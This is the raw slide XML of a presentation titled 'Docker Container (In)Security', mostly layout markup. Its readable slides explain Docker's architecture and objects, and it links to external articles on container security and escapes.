          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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219971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userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15829816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45" name="think-cell Slide" r:id="rId5" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId5" imgW="425" imgH="42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US" sz="2800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1600200"/>
            <a:ext cx="5303520" cy="595844"/>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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="2346960"/>
            <a:ext cx="5303520" cy="3825241"/>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55081" y="1600200"/>
            <a:ext cx="5303520" cy="595844"/>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6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355081" y="2346960"/>
            <a:ext cx="5303520" cy="3825241"/>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1D53A109-D5CE-4396-ABAA-48EF3649D2A9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10915650" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="365125"/>
            <a:ext cx="91440" cy="775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60618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5"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26147249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3" name="think-cell Slide" r:id="rId17" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId17" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>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1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3600" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="365125"/>
            <a:ext cx="11125200" cy="1021223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1825625"/>
            <a:ext cx="11125200" cy="4351338"/>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553450" y="6356350"/>
            <a:ext cx="2247900" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DCDD7791-E6BC-4AF9-A80A-CC4F635B5249}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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0" tIns="0" rIns="0" bIns="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201400" y="6356350"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="516252" y="6356350"/>
            <a:ext cx="1693161" cy="364210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345778403"/>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7" r:id="rId3"/>
    <p:sldLayoutId id="2147483804" r:id="rId4"/>
    <p:sldLayoutId id="2147483803" r:id="rId5"/>
    <p:sldLayoutId id="2147483795" r:id="rId6"/>
    <p:sldLayoutId id="2147483801" r:id="rId7"/>
    <p:sldLayoutId id="2147483802" r:id="rId8"/>
    <p:sldLayoutId id="2147483796" r:id="rId9"/>
    <p:sldLayoutId id="2147483798" r:id="rId10"/>
    <p:sldLayoutId id="2147483799" r:id="rId11"/>
    <p:sldLayoutId id="2147483800"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lang="en-US" sz="3600" kern="1200" smtClean="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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="―"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1146175" indent="-231775"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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing13.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cloud.google.com/containers"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tags" Target="../tags/tag28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing14.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId9"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tags" Target="../tags/tag30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing15.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId9"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1.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag31.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing16.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><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34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing17.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId4"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36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing18.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId4"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image" Target="../media/image13.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.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14.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag39.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing20.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jpetazzo.github.io/2015/09/03/do-not-use-docker-in-docker-for-ci/"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blog.aquasec.com/docker-security-best-practices"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blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/" TargetMode="External"/><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21.vml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://morphuslabs.com/attacking-docker-environments-a703fcad2a39" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide34.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/_fel1x/status/1151827567923609600" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide51.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image" Target="../media/image27.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing22.v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41816079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369" name="think-cell Slide" r:id="rId4" imgW="425" imgH="426" progId="TCLayout.ActiveDocument.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="think-cell Slide" r:id="rId4" imgW="425" imgH="42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Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963570" y="3789611"/>
            <a:ext cx="2629566" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suraj Khetani</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" spc="300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter: r00treaver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963570" y="1490839"/>
            <a:ext cx="1046643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FF9DFF5-3FCA-4D5F-89E8-7EAD527841B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="963570" y="649319"/>
            <a:ext cx="8290731" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Container (In)Security</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3600" spc="300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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9600" y="2754051"/>
            <a:ext cx="3200400" cy="2733675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2267932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 of Docker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2249487"/>
            <a:ext cx="5136227" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Engine is a client-server application with these major </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CLI client (Docker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A REST API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A server called the daemon process</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7640" y="2249487"/>
            <a:ext cx="5813989" cy="3723450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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88643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Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1600201"/>
            <a:ext cx="5650868" cy="4576762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Images - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a read-only template with instructions for creating a Docker container. To build your own image, you create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Containers - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A container is a runnable instance of an image. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Services - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services allow you to scale containers across multiple Docker daemons, which all work together as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>swarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>managers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. By default, the service is load-balanced across all worker nodes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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192" y="2355208"/>
            <a:ext cx="5515327" cy="2867032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7650393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pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211093" y="668973"/>
            <a:ext cx="10113346" cy="1113125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Running Docker Containers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
